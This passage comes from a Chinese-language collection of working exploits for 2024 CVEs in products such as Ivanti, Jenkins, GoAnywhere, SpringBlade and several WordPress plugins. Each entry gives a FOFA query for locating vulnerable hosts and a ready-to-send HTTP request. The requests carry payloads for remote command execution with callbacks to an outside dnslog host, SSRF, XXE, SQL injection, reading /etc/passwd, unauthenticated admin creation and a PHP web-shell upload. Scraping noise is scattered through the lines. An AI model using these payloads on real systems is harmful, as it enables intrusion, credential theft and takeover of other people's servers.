* K3 ?& \* h! s O" C. m0 ~Accept: */*
- d3 s8 X( L; L% k9 PAccept-Encoding: gzip, deflate( w, F' C3 c W7 v6 Y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# p3 q: S( u* e& Q% n% LContent-Type: application/x-www-form-urlencoded; charset=UTF-8! F7 R: t, E# p4 |4 g) U" n
X-Requested-With: XMLHttpRequest' v% n) x3 i" w1 X
, ]0 a9 j, m% z+ F1 M x
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B* w, Y2 S% n" j; I9 X `
4 ?7 G, P1 B# f9 u6 w
/ [$ E7 d. Q- Q8 ^# _99. Ncast盈可视高清智能录播系统busiFacade RCE
# x; o( Z$ J1 sCVE-2024-0305 ^* X- @. x4 H a0 P2 _- J! l
FOFA:app="Ncast-产品" && title=="高清智能录播系统"7 A) d5 D; q5 [2 J/ o+ h H z
POST /classes/common/busiFacade.php HTTP/1.1' r4 k1 l+ [6 j) j1 M' c" | [% \
Host: 192.168.40.130:8080
# t0 g; T, s, ?7 t9 [# m, ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
; {- B) G' e& `% S- qConnection: close4 R3 f, v7 {% l) n. w6 T
Content-Length: 154, w" Y6 i9 d- `. n, q% _. x! K! w
Accept: */*
. t3 j" Z% K/ s1 e4 R1 Q) P e5 d" x1 yAccept-Encoding: gzip, deflate" P% D# @$ m/ Q; q3 p; b6 z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 C, s9 X; b" F, n2 |+ C4 `* C
Content-Type: application/x-www-form-urlencoded; charset=UTF-8% M7 d; z6 C4 Z; |: [: B' g9 p
X-Requested-With: XMLHttpRequest
" \- T: A- p5 r9 B/ J$ z5 y/ A- u
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D3 e7 X) R1 q0 t* @
5 W" Q- o& { ~% P
7 L3 Z3 u& X; B: y; r+ d* z5 }100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传+ X" h5 f, Q5 n9 D/ o# x6 o& i
CVE-2024-0352
' Z& L! ?" s7 `+ n t, X) uFOFA:icon_hash="874152924") l2 v7 L1 V5 A7 o* N6 N- j9 ]$ y
POST /api/file/formimage HTTP/1.1
^: u1 b& Q2 B/ o2 G. GHost: 192.168.40.130- F: a2 [ A0 `+ m3 J
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
+ _# W& [/ ^6 `, e& `0 D6 O! w: VConnection: close
0 R x& z" V3 t5 AContent-Length: 201
T1 D) W* A5 O' EContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
8 E# T4 P( U) a- H$ @0 J9 b, sAccept-Encoding: gzip
$ N$ ~8 H6 m' g1 S1 K) P* Y6 Z/ v9 j- T
------WebKitFormBoundarygcflwtei
& n3 g3 Z/ Y/ g# ~: kContent-Disposition: form-data; name="file";filename="IE4MGP.php"' b ~$ i, B6 J3 q( o
Content-Type: application/x-php$ f5 ^( l4 \6 _6 b% X2 i
" E9 v5 P8 }! [# H+ w4 D/ ]2 ^ [) P" X2ayyhRXiAsKXL8olvF5s4qqyI2O1 j6 I9 t: A/ J
------WebKitFormBoundarygcflwtei--; {# ~1 E3 |6 Q6 \6 Q* c' f2 G
4 [4 ^7 f4 }7 k( G& b2 K
! M _1 T4 p: D/ ^
101. ivanti policy secure-22.6命令注入" h/ c( J) w9 n: ^$ \. W5 U, \
CVE-2024-21887
4 E+ U1 [) B3 ]8 c; `4 z$ D- lFOFA:body="welcome.cgi?p=logo"
) {7 [ o2 _2 ?- y9 k+ kGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
1 O" Y; s: c* }; M, H) uHost: x.x.x.xx.x.x.x$ ~3 R/ G3 L3 _7 R
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
5 Y6 Y! ~+ q: ?5 ^Connection: close o( K2 k3 N% ]5 {, n
Accept-Encoding: gzip
+ D& `- I8 e* H
! E' N& S* C4 d% | p' l
( X1 C' {# Z' B0 N" A' T! X6 R3 P; i102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行: n a9 A; b/ w6 O
CVE-2024-218930 Y: n" r3 y, K' T1 U, x
FOFA:body="welcome.cgi?p=logo"
3 r' ~4 ]; P/ m% G7 z/ oPOST /dana-ws/saml20.ws HTTP/1.1
$ C6 r4 e( @0 w. k& [Host: x.x.x.x
1 h+ P7 {% @' J( i7 ]0 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
6 [/ d2 ?6 |9 WConnection: close0 Q0 f/ f( w. O
Content-Length: 7922 o3 X4 c* w" t. x: F$ c
Accept-Encoding: gzip
# s& N q' w6 [/ K; P- B6 {6 f0 w1 a1 S4 a5 a
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
. A% i; w A- O- ?! H1 t) T6 }8 v
103. Ivanti Pulse Connect Secure VPN XXE
: B& o% W$ U! `5 C. F7 XCVE-2024-22024( \7 w' _+ P+ A& z* q/ [1 W- Q% e
FOFA:body="welcome.cgi?p=logo"' j6 u1 M# q7 n
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
$ j S. ?/ f6 Z& jHost: 192.168.40.130:111& u% `+ j( @' D6 L n- B) n- X
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
( C" N" X, ]9 |Connection: close
+ p) W) `! I$ kContent-Length: 2047 n7 s, X: N8 U
Content-Type: application/x-www-form-urlencoded
z3 z7 Y: X% n: @/ h" i5 OAccept-Encoding: gzip
# Y3 P3 s* N3 A! I. ]" r; i
6 Q0 h) `7 j, O% p7 c$ T0 l1 tSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
Y" b8 w6 `6 C' a5 D1 ~* e- Z& T& T, ]* ], b
5 u3 v! ]2 l% O& e$ v' N1 ]' `其中SAMLRequest的值是xml文件内容的base64值,xml文件如下% S7 w9 ], b. p8 Y2 P% ?- D
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>- O! [# W/ J9 v/ M
* x* r7 W! ` P0 u P( l7 P+ B
4 ]7 g5 }+ g" s" O0 G104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
# n r5 ? w }' d0 ICVE-2024-0569
3 G6 l- P9 J3 |! n# Y* rFOFA:title="TOTOLINK" w. T1 ?; s/ z* A# Y
POST /cgi-bin/cstecgi.cgi HTTP/1.16 w7 L- Z' m- S
Host:192.168.0.19 A% g% L8 f- b7 C- _% Z0 g
Content-Length:41# y9 {# u; x) x7 G# l
Accept:application/json,text/javascript,*/*;q=0.01- ^- I$ s# |) \2 }+ V4 a% B1 u0 b
X-Requested-with: XMLHttpRequest
. A! Y5 P, n% S0 vUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
2 L6 K8 }. w( ~4 {/ B( d* IContent-Type: application/x-www-form-urlencoded:charset=UTF-8
! O- T' H9 l+ Q' e$ @# EOrigin: http://192.168.0.1
0 ^5 m: `2 ?% l" v0 z! _2 h$ _/ ^. @Referer: http://192.168.0.1/advance/index.html?time=1671152380564
- P _% g3 J0 W) F9 F3 s! N5 {Accept-Encoding:gzip,deflate
1 f+ j& ]& S1 J! pAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
" g& Q3 y$ @5 ~+ L4 r3 ?! lConnection:close
7 X6 e0 Z3 y# W( w' D9 w4 Y5 k8 S& H$ P8 I# A$ f! p
{
/ K9 x( r! d& v+ j: m% `"topicurl":"getSysStatusCfg",* \# ]1 v3 j, _" ?( t) k( |, i$ z
"token":""- [, ^$ U+ `8 J6 n/ ^
}4 r% R+ X$ k4 c
7 P5 d, F5 O [8 F( L105. SpringBlade v3.2.0 export-user SQL 注入
$ i# F1 Y/ ~$ p8 ~8 B( WFOFA:body="https://bladex.vip"" e6 c/ N# t# X
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=18 M) P$ d1 m- z
% [/ g/ @8 S4 A# L& d) J3 g
106. SpringBlade dict-biz/list SQL 注入
7 [, }$ u' [) h' n0 A1 UFOFA:body="Saber 将不能正常工作"1 a4 X0 _1 ~+ \& K. b# |: Z
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
' y$ y* w( ^' U* AHost: your-ip! h# Q) b. u2 g+ x, k5 }6 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. O! S* \0 y; B8 A& o# W2 f FBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
7 N5 `- P8 }& k9 @2 K! dAccept-Encoding: gzip, deflate
: [* Q% k T0 D: |+ {2 pAccept-Language: zh-CN,zh;q=0.9
" _! v, _+ Z! J6 x5 ?Connection: close
1 b2 C# }5 ^0 J; Q. e; [! @
" y3 y* t- z& E, G. e1 |9 s8 s9 ^7 T2 t p
107. SpringBlade tenant/list SQL 注入+ U3 ]5 f6 }5 O! f# U
FOFA:body="https://bladex.vip"- L. |( C0 Q- I( T3 @
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
1 y9 a0 X/ T. D9 SHost: your-ip0 r) ?$ L- l9 G& D- u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. G5 O8 y" T \/ DBlade-Auth:替换为自己的8 X/ N( F6 k% M
Connection: close
9 Z. z3 m& u, s# U" n- R) Y8 Q( y( g5 u, x; l% |( T3 l: b2 {
/ e4 I) W% V! s) k: p3 |0 G# v
108. D-Tale 3.9.0 SSRF; I$ b" u1 U' N8 f: N; ]6 l
CVE-2024-216426 q' V) L' O) a2 J9 d* j9 d& g( E
FOFA:"dtale/static/images/favicon.png"
7 w9 y/ i/ b s3 w# s1 L9 X* RGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
5 r# g- L3 h5 k4 ^% o/ ]) _% _, F" hHost: your-ip" P* V* x# F! o8 g, \1 y
Accept: application/json, text/plain, */*: F# L( B4 Z5 T6 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.366 Q8 n# M6 ]4 U0 C+ }6 D+ a6 a' ]
Accept-Encoding: gzip, deflate, j0 Q% ^4 a, h! O! _2 B7 ^
Accept-Language: zh-CN,zh;q=0.9,en;q=0.87 c e1 {, ]6 v# x
Connection: close+ u, c* {: u, i- d3 H$ C! X
4 w+ l8 r6 r; k" D) Z' ?7 q
+ T% \) K( {6 g! `# O9 o3 _, W( N109. Jenkins CLI 任意文件读取5 e* }6 X0 \+ e0 z* ~
CVE-2024-23897! o- z6 E! j, ^
FOFA:header="X-Jenkins"
! }- }4 [) j: g" ], l$ {5 F' }POST /cli?remoting=false HTTP/1.1
# ^6 ]5 L+ U7 }% eHost:. I K& a8 K( g+ l. N- s
Content-type: application/octet-stream
/ a! T8 X/ ~1 mSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92- Z7 ~8 w. s+ G7 C' `8 h
Side: upload; B% M, D } X1 m' R# G& j: v9 p
Connection: keep-alive9 l$ e( O; v* L3 \
Content-Length: 163. \ @; Q+ h% b& s2 x) o7 T
) z+ j( }1 q! C
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
4 M! q& w. F6 b& }) ]
/ R* L9 I' h- R2 L7 J% h% j8 n( O/ q3 b. z3 u# N9 f
POST /cli?remoting=false HTTP/1.1
9 j; m2 a3 ?/ T: l) U. WHost:- O7 i4 ?( O/ f8 w
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e922 z5 \- l( l7 Q( J4 }$ G4 |1 {: {7 @7 Q
download
9 |1 \) c( o9 J3 c' J7 G& N8 TContent-Type: application/x-www-form-urlencoded& `# \' I1 p* h. F5 r" n7 ]5 N
Content-Length: 04 z, S1 F p- }
0 r( B! F" f# E! t8 z& c( m+ k9 M6 o/ T
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
' z7 {6 k8 h- c9 f: jjava -jar jenkins-cli.jar help
$ Y# u9 n, H6 o7 F[COMMAND]1 e, v, R- X- o( n, [
Lists all the available commands or a detailed description of single command.. J. N* I* [! v1 S& J
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)" [% ^; ?( x! O8 E. v" T
/ Y# F0 F2 Q t |& z9 \
& `- C" W9 }9 e( N0 T110. Goanywhere MFT 未授权创建管理员
3 Y& O: b5 ~ f& ~$ gCVE-2024-02049 V6 u0 |$ Y. n( N* B; D
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"( D7 Z& {% O8 P+ I/ v$ G+ m" i
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1) P$ H0 }$ b* n! l' w! Z
Host: 192.168.40.130:8000
, V% h& f: U# AUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36) T, b6 b# l* j [! v! n9 S
Connection: close# \$ `2 I0 r5 M( A3 f
Accept: */*7 V& `: h$ O* \, p+ F
Accept-Language: en! ?7 V5 J) h) k
Accept-Encoding: gzip7 ]2 s& |9 k$ ~* x b7 |' z5 J
1 o0 h. ^4 D: g2 B/ O2 h0 I* g# t. y: a* N
111. WordPress Plugin HTML5 Video Player SQL注入$ S- O3 p2 g! z1 E: E
CVE-2024-1061
: c N: d# `1 I/ b1 w0 nFOFA:"wordpress" && body="html5-video-player"
, a1 [2 U. A) l6 c0 KGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
* M. @4 ^, \, V$ r8 oHost: 192.168.40.130:112
# ~3 P: w) J5 GUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.365 K/ b$ F' z7 G! _( g
Connection: close' \/ n2 A' `( r/ D& @& J* y: c
Accept: */*4 M) I! z9 l% f
Accept-Language: en" b9 {4 o% o; }
Accept-Encoding: gzip; G$ }5 R8 @$ S, H B
; K. F# i' z7 D- Q. |8 I7 M" W
) S( d' D1 r& H3 S2 ^112. WordPress Plugin NotificationX SQL 注入4 i5 `& E1 a+ s( x6 Z1 Z: h
CVE-2024-1698
6 |& d5 X+ m! u$ @" j6 zFOFA:body="/wp-content/plugins/notificationx"
# ]2 B- x# ~, _1 G+ V9 V0 aPOST /wp-json/notificationx/v1/analytics HTTP/1.1
* ~# F: I! e$ r6 v9 vHost: {{Hostname}}
: m r! F' T) W$ X. A) ]* pContent-Type: application/json& A7 u: n6 X6 S+ p. k9 Z+ o
2 b5 }7 w, f! i{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}$ S: t, \/ C, _, L1 L6 k
4 @8 D/ G5 G$ \+ u; |
' y1 K- S9 i- X- ]
113. WordPress Automatic 插件任意文件下载和SSRF
6 @0 D- @( A0 ~CVE-2024-279540 Q) Q" v7 Q1 ~/ d
FOFA:"/wp-content/plugins/wp-automatic"3 M# a8 y& i) W2 Z! W
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
$ [8 {& Z5 z9 i: A+ eHost: x.x.x.x, B0 ?. R1 ?$ b7 J. @
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
6 V i$ O: m* u; MConnection: close
+ J: s# @5 {( T; ~ h) DAccept: */*" K4 ~2 @7 y5 Q& D' c! M3 {$ `" y
Accept-Language: en
# H9 @. s. I8 Q. e* oAccept-Encoding: gzip% A/ G/ ^6 h* J1 m
/ R. n x+ a) q+ M; ]$ Z
; Z! J+ s1 Q B3 G) o/ J2 j114. WordPress MasterStudy LMS插件 SQL注入
! w# z, x: i- _" N% `' X8 a& hFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
9 f- K# y6 V% e0 D( {5 g8 xGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
5 f5 I2 e0 t0 ~" i5 V n) v0 @Host: your-ip
. y+ Q/ `3 e9 @6 @. M4 I( eUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
. M9 R7 R4 d0 p: f8 ^0 w6 |Accept-Charset: utf-8! n% M! D1 h1 b- o- i
Accept-Encoding: gzip, deflate
2 M- H/ E/ }* @: O9 | i: O# JConnection: close; J5 [" ]/ S: g M
# o% S# W0 V, Y/ O8 X) h
4 v- U; k0 v" O0 N115. WordPress Bricks Builder <= 1.9.6 RCE/ `8 b, u f5 P. o
CVE-2024-25600
; d! w2 J2 s" U" _+ s& n3 J s" s8 LFOFA: body="/wp-content/themes/bricks/"
' S$ ?: V: S, E1 f第一步,获取网站的nonce值
( x8 r; Q/ `# y; @9 ^ l1 j4 k2 hGET / HTTP/1.1
% ~( w$ X; a' A2 m' b, oHost: x.x.x.x# L( f/ j# C+ l. z' j6 q
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
7 W0 l% w; Y, W* N& cConnection: close
O i% g& a1 F3 CAccept-Encoding: gzip
! @& N- I1 S4 r, `8 c! j
; J, N6 x& Y5 E# _3 a
: N& B0 A. {2 [6 o2 G' j第二步替换nonce值,执行命令
! u2 U! n% ]6 Z+ V2 C! dPOST /wp-json/bricks/v1/render_element HTTP/1.1+ J% H: Q& R- _' w5 a+ l
Host: x.x.x.x$ e5 R' b$ s1 x9 p) }( V- m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.365 ?# `0 V$ u4 w
Connection: close
. D2 y4 ]% M7 r$ q! G1 KContent-Length: 356) I/ R5 P" Y: j5 {4 `6 @2 J
Content-Type: application/json P* [5 {" |) [) ^' I
Accept-Encoding: gzip
2 s( b M8 j, p8 K5 T
. t/ R; s! |3 y+ T! w/ E- R2 V{
( y8 w3 Y% O* B5 v* P8 c"postId": "1",
% J/ j. [1 f' W L1 q "nonce": "第一步获得的值",% O( L0 p5 `: s. F8 D% O
"element": {
% Z" b! d& Q' N2 g4 | "name": "container",# P3 k2 s9 Y" _4 c
"settings": {1 {: t, r* z$ \1 T, r
"hasLoop": "true",
/ h8 v; z0 j5 I4 I, F9 M "query": {
. } t5 r, u3 m$ ^8 t "useQueryEditor": true,
: V. b6 L+ R9 T) Y' p# ] "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
$ @% h* Z' S# H; j/ A4 O9 T, E" K "objectType": "post"( W% f r$ X& _7 b% L
}
8 K4 F3 S: {" e9 E r }
6 ?' K& U$ c" M& [/ ?8 {7 C }
' C" ~8 T: i& [- |}4 U8 ?/ V+ N4 N+ L
$ Z% ^8 u. d4 k6 I) A7 ~' w3 K& |0 B5 J& O
116. wordpress js-support-ticket文件上传
: Y4 V/ {( c5 J7 _7 fFOFA:body="wp-content/plugins/js-support-ticket"2 h9 e3 k8 I& |4 D: e" Z6 h5 M
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.16 H9 B. I3 D' L$ I' c; ^/ U
Host:
t+ g3 l& w6 f$ L9 h6 T+ \3 WContent-Type: multipart/form-data; boundary=--------767099171
M, b, D4 |, x# q( V, DUser-Agent: Mozilla/5.0
3 P" a( Q' N3 H1 W& k. F' S# h S2 R6 P6 D9 y+ ^
----------767099171* `# P% |) {/ N8 M
Content-Disposition: form-data; name="action"
& ?$ i% @6 T" a4 |# oconfiguration_saveconfiguration
4 y+ V9 q/ F1 C----------767099171
, S% G. c( n9 m0 I0 I4 {7 ]Content-Disposition: form-data; name="form_request"
2 h' p: g1 q4 C" {9 r6 ?jssupportticket" M7 J( V0 S; U8 }2 \% X; e; Q0 ]
----------767099171
# }3 o5 X+ T2 F8 lContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php": d* G1 p8 D! b9 X7 _2 q
Content-Type: image/png
* ?$ L- A# p/ w" H9 \----------767099171--4 a/ n" J- _# C* q4 S" D$ H
& ?& ]6 ?6 K }* H, G8 h
' s U5 L+ l4 Z+ c& W117. WordPress LayerSlider插件SQL注入
7 w4 a/ d3 G0 }- \3 L$ k8 N8 Kversion:7.9.11 – 7.10.0
$ m" X" p" _: b& ^' TFOFA:body="/wp-content/plugins/LayerSlider/"
2 Z% X; e' o. L5 j! z! N6 kGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.17 }3 k K$ z2 E/ s/ n
Host: your-ip
: X. [7 n! E4 S% r9 [7 r4 b6 }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.09 g p( p4 I2 _/ o3 d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 j1 D: a3 A: I s# nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! l8 O' p- v( D* v& D0 }( hAccept-Encoding: gzip, deflate, br
" E( a( k% E: \% a: XConnection: close" X" X9 C. m! f
Upgrade-Insecure-Requests: 1. ~8 y2 U+ Z, X N" n% R
; R F. T: Z; J' K7 @
( n( B$ O( T" W0 ?
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
0 p I Q+ [8 ? h2 w m: l2 \CVE-2024-0939
7 W& z, ?3 J3 W1 g; w% U$ V3 b6 u. @FOFA:title="Smart管理平台"
) u. I6 }) V C7 cPOST /Tool/uploadfile.php? HTTP/1.1) l4 E7 k E: m. r" D+ g5 v
Host: 192.168.40.130:8443
" G; T/ J( P( ]: x5 ~Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
$ k" E) Z( G- g" D5 s- k5 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
9 C5 }; w4 N1 S0 \" JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 J4 ]# y/ Q' E3 C( @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ t7 q- v0 L5 D i7 F
Accept-Encoding: gzip, deflate* V- l7 q$ M# Z; |
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
9 J" l* U$ m1 D/ I* B! R BContent-Length: 405
8 J7 r1 G* c1 e6 k% uOrigin: https://192.168.40.130:8443% ]: Z( Q, E# H- |! a& |
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
' K4 A) C( K6 `6 AUpgrade-Insecure-Requests: 1
2 @3 N. W c& Q4 K: ]1 oSec-Fetch-Dest: document# U4 c% z: F3 g
Sec-Fetch-Mode: navigate+ C% V4 ^+ P# W7 h
Sec-Fetch-Site: same-origin
" ~7 {* D- C2 [$ pSec-Fetch-User: ?1
, p+ v7 ?9 C \8 S3 a" |9 B* qTe: trailers, s y. g0 z& a8 S7 |1 ` O
Connection: close
4 r( e% Q' w, {5 g% a# M
* z; U# k/ u( l1 f9 w# o) g. \-----------------------------13979701222747646634037182887
' h# i& q' I$ t0 T0 R+ jContent-Disposition: form-data; name="file_upload"; filename="contents.php"
: I0 f' O4 e* S# s; lContent-Type: application/octet-stream# n* h4 ?. m8 m! K6 t
# b$ q% W5 C. E0 I Q* ?0 R
<?php
: @4 j& B, m1 g! Y" Psystem($_POST["passwd"]);% C S0 J6 q' A" z
?>$ }* }( \" f" @# f) o
-----------------------------139797012227476466340371828877 n i3 a0 w7 @" C
Content-Disposition: form-data; name="txt_path"
: {3 A: T& S# S: `6 D( {6 j+ `, ?* t; G) a
/home/src.php) G+ T4 c1 n: Q2 S' q
-----------------------------13979701222747646634037182887--
' p" h4 p# p( b7 O6 u3 Z0 e r/ r8 y9 I0 f. S! y
- b9 P, [& o( s3 @
访问/home/src.php
+ \$ ^; X+ o/ {3 I, @: e4 T0 A5 }' x9 H- K( L! J5 `) J
119. 北京百绰智能S20后台sysmanageajax.php sql注入
8 D- R4 s8 v# Y: j+ bCVE-2024-1254
# Y( p* K# @3 l) H6 D. UFOFA:title="Smart管理平台"- F E4 T* W( A/ N. C
先登录进入系统,默认账号密码为admin/admin
/ r0 h# k: ~* }8 o* w, C: c9 ZPOST /sysmanage/sysmanageajax.php HTTP/1.11" ]8 H7 L1 V4 f' t
Host: x.x.x.x
) _8 a8 q) o1 W. A9 rCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
4 O2 ~7 }" @' [' n9 @* ?3 k- q6 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.02 l; R3 c! N1 O3 ?. ^- l7 h$ |
Accept: */*
" v; Q# D. Z4 B3 \5 W( WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) { \- |1 c8 P( ?& pAccept-Encoding: gzip, deflate
/ A) U4 o6 O, T0 I- j8 f8 W, z( z dContent-Type: application/x-www-form-urlencoded; t. @; @8 y. j! T
Content-Length: 109
~6 Y6 K K* W2 c9 C* ROrigin: https://58.18.133.60:8443: ]! [& N+ k. k3 E
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
# V C& x: ~% m2 y! |Sec-Fetch-Dest: empty1 e" p, o9 R" J" L3 h4 {: N
Sec-Fetch-Mode: cors
3 H6 t6 Y! \" jSec-Fetch-Site: same-origin& a" ^( R( d& ^9 n& ^
X-Forwarded-For: 1.1.1.1
! {5 X3 j# l/ e2 N! W) K5 mX-Originating-Ip: 1.1.1.1
